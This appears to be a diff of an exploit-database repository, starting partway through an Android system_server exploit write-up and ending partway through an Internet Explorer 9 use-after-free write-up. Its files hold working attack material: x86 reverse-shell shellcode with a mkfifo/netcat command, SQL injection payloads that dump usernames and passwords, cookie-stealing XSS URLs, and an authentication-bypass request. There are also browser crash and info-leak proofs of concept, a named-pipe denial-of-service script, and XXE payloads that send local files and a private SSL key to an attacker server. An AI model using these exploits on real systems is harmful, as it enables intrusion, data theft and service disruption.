| Bitmap | Bitmap ||||hole|||| Bitmap | Bitmap | Bitmap | Bitmap |
----------------------------------------------------------------
4. Now that there's a THREAD_SIZE-sized hole opened up, we can call AudioSystem.loadSoundEffects() in order to re-create the SoundPool object within system_server. This will allocate a new "SoundPoolThread" thread in system_server, which (after brief initialization) enters a polling loop on a condition variable (or rather, a futex), waiting for messages to be enqueued. However, this thread's stack will be directly mmap-ed in our previously created hole, like so:
<--low high-->
---------------------------------------------------------------------------
| Bitmap | Bitmap |SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap |
---------------------------------------------------------------------------
6. Now, similarly to step 3., we can free the chunk directly before the previously unmapped chunk, creating the following state:
<--low high-->
-----------------------------------------------------------------------------
| Bitmap ||||hole||||SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap |
-----------------------------------------------------------------------------
6. Finally, we send our "poisoned" bitmap object, which should get allocated directly in front of the SoundPoolThread's stack. Then, we force garbage collection once more, resulting in both the bitmap and the SoundPoolThread's stack being unmapped. However, since the SoundPoolThread is still waiting on a futex, this is fine. Here's what this stage looks like:
<--low high-->
--------------------------------------------------------------------------------
| Bitmap |Poison Bitmap|SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap |
--------------------------------------------------------------------------------
||
\/
<--low high-->
--------------------------------------------------------------------------------
| Bitmap ||||||||||||||||hole||||||||||||||||| Bitmap | Bitmap | Bitmap | Bitmap |
--------------------------------------------------------------------------------
7. At this point we can enqueue another notification, this time backed by a specially crafted ashmem file, containing two separate pieces of information:
a. A chunk of position independent ARM/ARM64 code, followed by
b. A ROP stack
This notification will be of size THREAD_SIZE*2, and will therefore fill up the hole we just set up, resulting in the following state:
<--low high-->
-------------------------------------------------------------------
| Bitmap | PIC code | ROP Stack | Bitmap | Bitmap | Bitmap | Bitmap |
-------------------------------------------------------------------
8. Now, we can safely call AudioService.unloadSoundEffects() once more. This will signal the condition variable that SoundPoolThread was waiting on, but now when it returns it will be executing our own ROP stack. The ROP stack simply mmap-s the ashmem file descriptor with PROT_EXEC and jumps into it (essentially executing the PIC code we supplied).
Proofs of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40874.zip

7
platforms/cfm/webapps/27854.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/17941/info
Cartweaver ColdFusion is prone to SQL-injection vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input before using it in SQL queries.
Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/Details.cfm?ProdID=[SQL]

113
platforms/lin_x86/shellcode/40872.c Executable file
View file

@ -0,0 +1,113 @@
/*
;author: Filippo "zinzloun" Bersani
;date: 05/12/2016
;version: 1.0
;X86 Assembly/NASM Syntax
;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit
; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
; Linux bb32 4.4.0-45-generic 32bit
; description:
get a reverse shell executing a shell script saved in tmp that execute netcat that reverse the shell to the listener,
considering that by now the default nc configuration does not permitt to execute (-e) command directly anymore
this is a different approach that permitt to execute not only netcat.
LIMITATION: size of the shellcode; the attacker has to have gained the privilege to execute commmand (/bin/bash)
; see comment for details
global _start
section .text
_start:
CreateFile:
xor eax, eax ;zeroing
xor edx, edx
push eax ;NULL byte as string terminator
push 0x65782e2f ;name of file to be executed /tmp/.xe
push 0x706d742f
mov ebx, esp ;ebx point to pushed string
mov esi, esp ;save the name of the file for a later use
mov al,0x8 ;create the file...
mov cl,077o ;...with 77 permission in octal (to avoid 0)
int 0x80
jmp CallPop
WriteString:
pop ecx ;get the command string to write in the file, 3rd arg
mov ebx,eax ;save the returned value of the previous sys call (fd) into ebx, 2nd arg
mov dl,0x09 ;now we put value $0x09 into dl...
inc dl ;0x09 + 1 == 0x0A, get the bad Line feed char ;)
mov byte [ecx+92],dl ;replace our R char with 0x0A *
xor edx,edx
mov dl,93 ;len of the buffer to write, 4th arg **
mov al,0x04 ;sys call to write the file
int 0x80
mov ebx,eax ;save the returned value of the previous sys call (fd) into ebx, 2nd arg
mov dl,0x09 ;now we put value $0x09 into dl...
inc dl ;0x09 + 1 == 0x0A, get the bad Line feed char ;)
mov byte [ecx+92],dl ;replace our R char with 0x0A *
xor edx,edx
mov dl,93 ;len of the buffer to write, 4th arg **
mov al,0x04 ;sys call to write the file
int 0x80
CloseFile:
xor eax,eax
mov al, 0x6 ;close the stream file
int 0x80
ExecFile:
xor eax, eax
push eax ;push null into the stack
;push ////bin/bash into the stack
push 0x68736162
push 0x2f6e6962
push 0x2f2f2f2f
mov ebx,esp ;set the 1st arg /bin/bash from the stack
;set up the args array
push eax ; null
push esi ; get the saved pointer to the /tmp/.xe
push ebx ; pointer to /bin/bash
mov ecx, esp ;set the args
xor edx,edx
mov al, 0xb ;sys call 11 to execute the file
int 0x80
CallPop:
call WriteString
;this string can be configured to execute other command too, you have only to adjust the length of the buffer (**) and the index of the char (R) to replace (*)
;according to the length of the string
db "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | /bin/nc localhost 9999 > /tmp/fR"
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x31\xd2\x50\x68\x2f\x2e\x78\x65\x68\x2f\x74\x6d\x70\x89\xe3\x89\xe6\xb0\x08\xb1\x3f\xcd\x80\xeb\x37\x59\x89"
"\xc3\xb2\x09\xfe\xc2\x88\x51\x5c\x31\xd2\xb2\x5d\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68"
"\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x56\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xe8\xc4\xff\xff\xff\x72\x6d\x20\x2d\x66"
"\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x20\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x20\x63\x61\x74\x20\x2f\x74\x6d\x70\x2f"
"\x66\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x69\x20\x32\x3e\x26\x31\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x6e\x63\x20\x20\x6c\x6f"
"\x63\x61\x6c\x68\x6f\x73\x74\x20\x39\x39\x39\x39\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x66\x52";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

1
platforms/linux/remote/40339.py
View file

@ -1,4 +1,3 @@
/*
add by SpeeDr00t@Blackfalcon (jang kyoung chip)

28
platforms/php/webapps/14979.txt
View file

@ -1,28 +0,0 @@
==================================================================
# Exploit Title: AlstraSoft AskMe Pro SQL Injection Vulnerability
# Date: 12/09/2010
# Author: Amine_92
# Email: amine92_16@hotmail.fr
# Software Link: http://www.alstrasoft.com/askme.htm
# Version: All Version
# Price: 99.99$
# Tested on: Xp Sp 2
# Home: Dark Zone Organization (www.v9b.org/vb)
==================================================================
SQL injection in AlstraSoft AskMe Pro
Affected items:
http://www.Victime.com/forum_answer.php?que_id=[SQL]
Example:
-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert--
Demo URL:
http://www.Victime.com/forum_answer.php?que_id=-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert--
==================================================================
Good Luck
Tank's To : All Memeber Of Dark Zone & Administrator Emptyzero
Don't Forget Our Brother In Gaza & Palestine

2
platforms/php/webapps/17050.txt
View file

@ -47,7 +47,7 @@ function xpath(){document.forms["xml"].submit();}
function xss(){document.forms["xss"].submit();}
</script>
<form action="http://FCMS/inc/getChat.php" enctype="application/x-www-form-urlencoded" method="POST" id="xml">
<input type="hidden" name="message" value="\\';--\\&#34;;--" /></form>
<input type="hidden" name="message" value="\\';--\\";--" /></form>
<a href="javascript: xml();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit XML Injection!<h3></center></font></b></a>
<form action="http://FCMS/messageboard.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">

7
platforms/php/webapps/26110.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/14499/info
Gravity Board X (GBX) is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/deletethread.php?board_id="><script>alert(document.cookie)</script>

15
platforms/php/webapps/38312.txt
View file

@ -1,15 +0,0 @@
source: http://www.securityfocus.com/bid/57948/info
AbanteCart is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
AbanteCart 1.1.3 is vulnerable; other versions may also be affected.
http://www.example.com/abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/special%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E&sort=%22%3E%3Cscript%3Ealert%284%29;%3C/script%3E
http://www.example.com/abantecart/index.php?currency=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&product_id=109%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/product
http://www.example.com/abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/abantecart/index.php?rt=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&s=your_admin%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&token=957bf7cb71078f4471807da1c42d721e%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E

27
platforms/php/webapps/40877.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: AbanteCart 1.2.7 Stored XSS
# Date: 06-12-2016
# Software Link: http://www.abantecart.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
By default all user input is escaped using `htmlspecialchars`.
But we can pass `__e` value which is base64 encoded and unfortunatelly those datas are not cleaned.
http://security.szurek.pl/abantecart-127-stored-xss-and-sql-injection.html
2. Proof of Concept
For example `address_1="><script>alert(2);</script>&` can be encoded as: `__e=YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m`.
So create new order and set `address_1` value as `__e` using for example Burp:
```
Content-Disposition: form-data; name="__e"
YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m
```

44
platforms/php/webapps/40882.txt Executable file
View file

@ -0,0 +1,44 @@
# Exploit Title: Edge SkateShop Authentication Bypass
# Date: 6/12/2016
# Exploit Author: Delilah
# Vendor HomePage: http://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html
# Software Link: http://www.sourcecodester.com/sites/default/files/download/gebbz/edgesketch.zip
# Tested on: xampp
go to http://localhost/EdgeSketch/adminlogin.php
username = admin' #
password = anything
# Proof of Concept:
POST /EdgeSketch/adminlogin.php HTTP/1.1
Host: 10.0.2.15
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.0.2.15/EdgeSketch/
Cookie: PHPSESSID=5n96kq5kd17joptp1sivhm4tl4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
admin_username=admin'%20#&admin_password=fdgdhf&admin_login=
HTTP/1.1 200 OK
Date: Tue, 06 Dec 2016 16:10:00 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
X-Powered-By: PHP/5.6.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 107
Connection: close
Content-Type: text/html; charset=UTF-8
<script>alert('You're successfully login!')</script><script>window.open('Admin/index.php','_self')</script>

64
platforms/windows/dos/40875.html Executable file
View file

@ -0,0 +1,64 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=952
There is an info leak in JSON.parse. If this function is called with a reviver, and the reviver modifies the output object to contain a native array, the Walk function assumes that this array is a Var array, and writes pointers to it. These pointers can then be read out of the array by script.
A minimal PoC is as follows:
var once = false;
var a = 1;
function f(){
if(!once){
a = new Array(1, 2, 3);
this[2] = a;
}
once = true;
return {};
}
JSON.parse("[1, 2, [4, 5]]", f);
A full PoC is attached. When loaded in a browser, this PoC will delay pointers in an alert dialog.
-->
<html>
<body>
<script>
var once = false;
var a = 1;
function f(){
if(!once){
a = new Array(1, 2, 3);
this[2] = a;
}
once = true;
//alert("f " + this);
return {};
}
JSON.parse("[1, 2, [4, 5]]", f);
var n = new Number(a[0]);
n = n >> 1;
var s = n.toString(16);
n = new Number(a[1]);
n = n >> 1;
s = s + n.toString(16);
n.length = 100;
n = new Number(a[2]);
n = n >> 1;
s = s + " " + n.toString(16);
n = new Number(a[3]);
n = n >> 1;
s = s + n.toString(16);
alert(s);
</script>
</body>
</html>

32
platforms/windows/dos/40878.txt Executable file
View file

@ -0,0 +1,32 @@
Source: http://blog.skylined.nl/20161201001.html
Synopsis
A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Edge. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Edge 11.0.10240.16384
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script does not prevent an attacker from triggering the vulnerable code path.
Repro:
/<style>:first-letter{word-spacing:9
Variation:
x<style>:first-letter{background-position:inherit
Description
At the time this issue was first discovered, Mem­GC was just introduced, and I had not yet fully appreciated what an impact it would have on mitigating use-after-free bugs. Despite Mem­GC being enabled in Microsoft Edge by default, this issue appeared to me to have been a use-after-free vulnerability. However, both Microsoft and ZDI (whom I sold the vulnerability to) describes it as a memory corruption vulnerability, so it's probably more complex than I assumed.
At the time, I did not consider this vulnerability to be of great interest, as there was no immediately obvious way of controlling the vulnerability in order to exploit it. So, I did not do any further investigation into the root cause and, if this was indeed a use-after-free, how come Mem­GC did not mitigate it? In hindsight, it would have been a good idea to investigate the root cause, as any use-after-free that is not mitigated by Mem­GC might provide hints on how to find more vulnerabilities that bypass it.
Time-line
August 2015: This vulnerability was found through fuzzing.
August 2015: This vulnerability was submitted to ZDI.
December 2015: Microsoft addresses this vulnerability in MS15-125.
December 2016: Details of this vulnerability are released.

42
platforms/windows/dos/40879.html Executable file
View file

@ -0,0 +1,42 @@
<!--
Source: http://blog.skylined.nl/20161202001.html
Synopsis
A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script does not prevent an attacker from triggering the vulnerable code path.
Repro.html:
-->
<iframe style="border:1px solid red;width:100%;height:100%;" name="iframe"></iframe>
<script>
window.open("Repro.xml", "iframe");
set­Timeout(function () {
window.open('javascript:void(location.href = "about:blank");', "iframe");
}, 1000);
</script>
<!--
Repro.xml:
<!DOCTYPE x PUBLIC "" "http://www.w3.org/TRt.dtd">
Description
This is the first security vulnerability I sold to ZDI after I quit my job at Google to live off security bug bounties. It appears I either did not analyze this issue (probably), or misplaced my analysis (probably not), as I cannot find any details in my archives, other than a repro and a HTML bug report (provided below) created by a predecessor to Bug­Id. From the information provided by ZDI in their advisory, and Microsoft in their bulletin, as well as the bug report, it seems to have been a use-after-free vulnerability. Unfortunately, that is all the analysis I can provide.
Time-line
June 2012: This vulnerability was found through fuzzing.
June 2012: This vulnerability was submitted to ZDI.
July 2012: This vulnerability was acquired by ZDI.
September 2012: This vulnerability was disclosed to Microsoft by ZDI.
February 2013: Microsoft addresses this vulnerability in MS13-009.
December 2016: Details of this vulnerability are released.
-->

75
platforms/windows/dos/40880.txt Executable file
View file

@ -0,0 +1,75 @@
Source: http://blog.skylined.nl/20161205001.html
Synopsis
A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Edge. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Edge
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script does not prevent an attacker from triggering the vulnerable code path.
Discovery
This issue was found through fuzzing in the 64-bit version of Microsoft Edge, in which the original repro triggered what appeared to be a NULL pointer dereference in CBase­Scriptable::Private­Query­Interface. So, after a very brief look at the repro, I filed a bug in the public bug tracker and published it on twitter. The original repro was:
<body onload=typeof(open().crypto)>
Soon after, I found another repro that trigger a slightly different NULL pointer dereference in CBase­Scriptable::Private­Query­Interface in a 64-bit version of Edge. The second repro was:
<body onload=typeof(open().ms­Credentials)>
I never tested the these two repros in a 32-bit version of Edge before publishing them, which I immediately regretted after finding that the second repro triggered an access violation using the obviously non-NULL address 0x1BF37D8 in a 32-bit version of Edge!
Around this time, I started finding many variations of this bug: getting the type of various properties or objects associated with another window was triggering all kinds of access violations. Many of these were not using NULL pointers on 32-bit Edge. I collected all the variations my fuzzers had found and come up with these additional repros:
<body onload=typeof(open().document.create­Element("canvas").get­Context("2d"))>
This triggered an access violation in edgehtml.dll!CBase­Scriptable::Private­Query­Interface while attempting to read from address 0x4C261 in the 32-bit version of Edge.
<body onload=typeof(open().navigator.media­Devices)>
This triggered an access violation in charkra.dll!Thread­Context::Pre­Sweep­Callback while attempting to read from address 0x­FF80A90F in the 32-bit version of Edge.
<body onload=typeof(open().to­String)>
This triggered an assertion failure because it was calling a deprecated API in the 32-bit version of Edge.
I looked again at the original crypto repro and noticed that although it triggered an access violation using a NULL pointer on both 32-bit and 64-bit versions of Edge, the two addresses (3 and 8 respectively) had different alignment. This is rather odd: true NULL pointer dereferences can cause an access violation at a different offset from NULL on these two architectures because property values and pointers stored before the one being read/written can have different sizes on 32-bit and 64-bit systems, but one usually expects them to have similar alignment: the last two bits of the address should be the same.
Report
If only I had tested the original repro in a 32-bit version of Edge when I first analyzed the issue, I might have realized it was more than a simple NULL pointer and not published it before doing additional research.
I contacted ZDI and asked if they would be interested in buying the vulnerability at this point, given that I publicly released the repro that triggered a NULL pointer and filed it with Microsoft. I was hoping they would decide that this did not disclose the underlying vulnerability and that it as such would still be a 0-day. Unfortunately for me, they were not interested in acquiring details in this situation.
At that point I decided to contact the Microsoft Security Response Center and report the additional information I had found. I also contacted a few people working on the Edge team at Microsoft directly to let them know they might want to escalate this bug from a simple NULL pointer to a security vulnerability. Unfortunately, this let them to decided to mark the bug I had filed in the Edge bug tracker as hidden. I warned them that this did little good, as the details were still public in my twitter and even if I deleted that, in general what goes on the internet stays on the internet.
Analysis
Since I had publicly released the repro, I was not going to be seeing any kind of reward for this bug, so analyzing the issue was not a priority for me. Unfortunately that meant I did not analyze it at all, other than to speculate that this bug was likely to have been a type-confusion or bad cast, where assembled code was used as data, leading to most of these repros triggering an access violation at a static address that depended on the code they were using as data. It may therefore be possible to find a variation that uses code that represents an address in the address space of Edge where an attacker might store data under his/her control. This is especially true for 32-bit Edge, as the address space is a lot smaller. Depending on what the code does with the address, it might be possible to execute arbitrary code under perfect circumstances.
On Hiding bugs in public bug trackers
Hiding a publicly reported bug after the fact is a very bad idea IMHO, as it paints an easy to detect target on the bug. Every smart attacker should have a system that makes regular copies of all publicly reported bugs in target applications and reports to their owner all bugs that become hidden, with a copy of all the information it scraped from the bug before it was hidden. Since hiding a public bug only ever happens for one of two reasons: the bug was found to be a security issue, or the report accidentally contains personal information that the owner wants hidden. It should be quite easy to distinguish between the two to filter out the vulnerabilities, giving an attacker a nearly free stream of nearly 0-day bugs. If you work on a team that has a public bug-tracker, you may want to discuss this with your team and decided how to handle such situations.
Conclusion
As useful as Bug­Id is in automating a lot of the analysis I do on every bug I find, and in helping me prioritize the issues that are most likely to be vulnerabilities, it is not perfect and cannot always detect a vulnerability for what it is. Bug­Id is not a perfect replacement for full manual analysis of bugs.
In this case I relied to heavily on its ability to distinguish vulnerabilities from other bugs. Because of the nature of this issue, the repros caused access violations at static addresses, many of which near enough to NULL to be interpreted as NULL pointer dereferences, especially for the first repro I found. Bug­Id can not actually determine the root cause of a crash, but attempts to deduce the root cause based on the details of the crash it causes. In this case, the crash looked too similar to a regular NULL pointer dereference for Bug­Id to detect it as anything else.
However, in my current situation, where I am finding way more bugs than I can analyze manually, Bug­Id does a very good job at helping me prioritize and analyze issues. I have used Bug­Id on hundreds of bugs and, as far as I know, this is the first time I mistook a security vulnerability for a regular bug based on the Bug­Id report. As such, the false-negative rate I have experienced is a fraction of a percent, which IMHO is remarkably low and entirely acceptable. At the same time, the false-positive rate I have seen so far is exactly zero.
In order to prevent this from happening in the future, I now test each repro in both the 32-bit and 64-bit version of Edge, do more manual analysis on bugs that get reported as a NULL pointer with a non-DWORD-aligned address (e.g. 3 in this case), and wait slightly longer for my fuzzers to find variations of a bug before I start my analysis and report the issue as a non-security bug.
Time-line
29 April 2016: This vulnerability was first found through fuzzing.
10 May 2016: This issue was published on Twitter and reported to Microsoft.
13 May 2016: This vulnerability was submitted to ZDI.
18 May 2016: This vulnerability was declined by ZDI.
18 May 2016: This vulnerability was reported to MSRC and I informed Edge developers directly on the seriousness of the bug.
18 May 2016: The issue was hidden in public bug tracker.
14 June 2016: Microsoft addresses this vulnerability in MS16-068.
December 2016: Details of this vulnerability are released.

59
platforms/windows/dos/40883.py Executable file
View file

@ -0,0 +1,59 @@
#!/usr/bin/python
# wlanautoconfig-poc.py
#
# Windows WLAN AutoConfig Named Pipe POC
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2016
#
# > wifinetworkmanager.dll!__FatalError(char const *,unsigned # long,char const *, ...)
# AsyncPipe::ReadCompletedCallback(void)
# AsyncPipe::Dispatch(int,void *,void *, ...)
# Synchronizer::EnqueueEvent(...)
# AsyncPipe::ReadCompletedStatic(...)
#
# --> STATUS_STACK_BUFFER_OVERRUN @ svchost.exe
#
# Tested:
#
# Windows 10 x86/x64 BUILD 10.0.14393 (vulnerable)
# Windows Server 2012 R2 x64 (not vulnerable, service doesn't create pipe)
#
# Dependencies:
#
# pip install pypiwin32
#
# Notes:
#
# This won't kill Wlansvc service, but the thread servicing the pipe will terminate
#
import win32file
import pywintypes
import msvcrt
BUF_SIZE = 4096
PIPE_NAME = r'\\.\pipe\WiFiNetworkManagerTask'
def main():
try:
handle = win32file.CreateFile(PIPE_NAME, win32file.GENERIC_WRITE, 0, None, win32file.OPEN_EXISTING, 0, None)
except Exception:
print("Error: CreateFile() failed\n")
return
fd = msvcrt.open_osfhandle(handle, 0)
if(fd < 0):
print("Error: open_osfhandle() failed\n")
return
buf = bytearray(b'\x42' * BUF_SIZE)
# exact number here could vary, keeping it simple
while True:
win32file.WriteFile(handle, buf)
if __name__ == "__main__":
main()

212
platforms/windows/local/40873.txt Executable file
View file

@ -0,0 +1,212 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-POWERSHELL-XML-EXTERNAL-ENTITY.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
===========
PowerShell
PowerShell (including Windows PowerShell and PowerShell Core) is a task
automation and configuration management framework
from Microsoft, consisting of a command-line shell and associated scripting
language built on the .NET Framework.
PowerShell provides full access to COM and WMI, enabling administrators to
perform administrative tasks on both local
and remote Windows systems as well as WS-Management and CIM enabling
management of remote Linux systems and network devices.
Vulnerability Type:
===================
XML External Entity
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
PowerShell can read and process XML files, this is by design. However, its
XML parser is vulnerable to XXE attacks, if a user reads a
malicious XML file using powershells XML API. This can potentially allow
local files to be accessed and exfiltrated to an attackers server.
**MSRC response: "behavior by design for parsing".**
Issue is that this setting is default, this puts 'unknowing' users at risk
for XXE attacks and file disclosure. After running PS to process an
Evil XML file from Windows CL you may see errors like:
"Cannot convert value "System.Object[]" to type "System.Xml.XmlDocument".
Error: "Invalid character in the given encoding"
OR
"Exception calling "Load" with "1" argument(s): "Unexpected DTD
declaration."
However, the Local to Remote file access theft still works as planned...
Tested Windows 7 SP1
PS C:\> $psversiontable
Name Value
---- -----
CLRVersion 2.0.50727.5485
BuildVersion 6.1.7601.17514
PSVersion 2.0
Exploit POC code(s):
===================
Scenarios A/B:
A) Reads XML from Web Server:
-------------------------------
Access 'c:\Windows\msdfmap.ini' used by MS ADO Remote Service.
python -m SimpleHTTPServer 8080 (ATTACKER-SERVER)
'payload.dtd' (ATTACKER-SERVER)
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://
[ATTACKER-SERVER]:8080?%file;'>">
%all;
'PWN.xml' (ATTACKER-SERVER)
<?xml version="1.0"?>
<!DOCTYPE HYP3RLINX [
<!ENTITY % file SYSTEM "c:\Windows\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://[ATTACKER-SERVER]:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
Run from PS CL to load XML:
$vuln = New-Object System.Xml.XmlDocument
$vuln.Load("http://[ATTACKER-SERVER]/PWN.xml")
Users 'msdfmap.ini' file is accessed by attacker.
B) Read XML from remote share in LAN:
----------------------------------------
Example uses three different computers.
VICTIM-COMPUTER local machine using Powershell to read XML.
REMOTE-SHARE is third computer in LAN where 'PWN.xml' is read from.
ATTACKER-SERVER the place where files stolen from VICTIM-COMPUTER will be
sent.
Assuming user is running XAMPP, try target the servers SSL Private key.
[ATTACKER-SERVER]
python -m SimpleHTTPServer 8080
'payload.dtd' (Host on ATTACKER-SERVER)
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://
[ATTACKER-SERVER]:8080?%file;'>">
%all;
'PWN.xml' (Host on REMOTE-SHARE)
<?xml version="1.0"?>
<!DOCTYPE HYP3RLINX [
<!ENTITY % file SYSTEM "C:\xampp\apache\conf\ssl.key\server.key">
<!ENTITY % dtd SYSTEM "http://[ATTACKER-SERVER]:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
[VICTIM-COMPUTER]
Run these examples from PowerShell Command Line.
'VULN.ps1'
Get-WinEvent -FilterXml ([xml](Get-Content
\\[REMOTE-SHARE]\home\username\PWN.xml))
OR
$poc='\\[REMOTE-SHARE]\home\username\PWN.xml'
$test=(Get-Content $poc) -as [Xml]
Enjoy your private key file!
Disclosure Timeline:
===========================================================
Vendor Notification: November 14, 2016
Vendor: "behavior by design for parsing." November 23, 2016
December 5, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

322
platforms/windows/remote/40881.html Executable file
View file

@ -0,0 +1,322 @@
<!--
Source: http://blog.skylined.nl/20161206001.html
Synopsis
A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. A pointer set up to point to certain data on the stack can be used after that data has been removed from the stack. This results in a stack-based analog to a heap use-after-free vulnerability. The stack memory where the data was stored can be modified by an attacker before it is used, allowing remote code execution.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.
Repro.html:
<!doctype html>
<script>
var o­Window = window.open("about:blank");
o­Window.exec­Script('window.o­URIError = new URIError();o­URIError.name = o­URIError;')
try { "" + o­Window.o­URIError; } catch(e) { }
try { "" + o­Window.o­URIError; } catch(e) { }
</script>
Description
A Javascript can construct an URIError object and sets that object's name property to refer to the URIError object, creating a circular reference. When that Javascript than attempts to convert the URIError object to a string, MSIE attempts to convert the URIError object's name to a string, which creates a recursive code loop that eventually causes a stack exhaustion.
MSIE attempts to handle this situation gracefully by generating a Java­Script exception. While generating the exception, information about the call stack is gathered using the Javascript­Stack­Walker class. It appears that the code that does this initializes a pointer variable on the stack the first time it is run, but re-uses it if it gets called a second time. Unfortunately, the information the pointer points to is also stored on the stack, but is removed from the stack after the first exception is handled. Careful manipulation of the stack during both exceptions allow an attacker to control the data the pointer points to during the second exception.
This problem is not limited to the URIError object: any recursive function call can be used to trigger the issue, as shown in the exploit below.
Exploit
As mentioned above, the vulnerable pointer points to valid stack memory during the first exception, but it is "popped" from the stack before the second. In order to exploit this vulnerability, the code executed during the first exception is going to point this pointer to a specific area of the stack, while the code executed during the second is going to allocate certain values in that same area before the pointer is re-used.
Control over the stack contents during a stack exhaustion can be achieved by making the recursive calls with many arguments, all of which are stored on the stack. This is similar to a heap-spray storing values on large sections of the heap in that it is not entirely deterministic, but the odds are very highly in favor of you setting a certain value at a certain address.
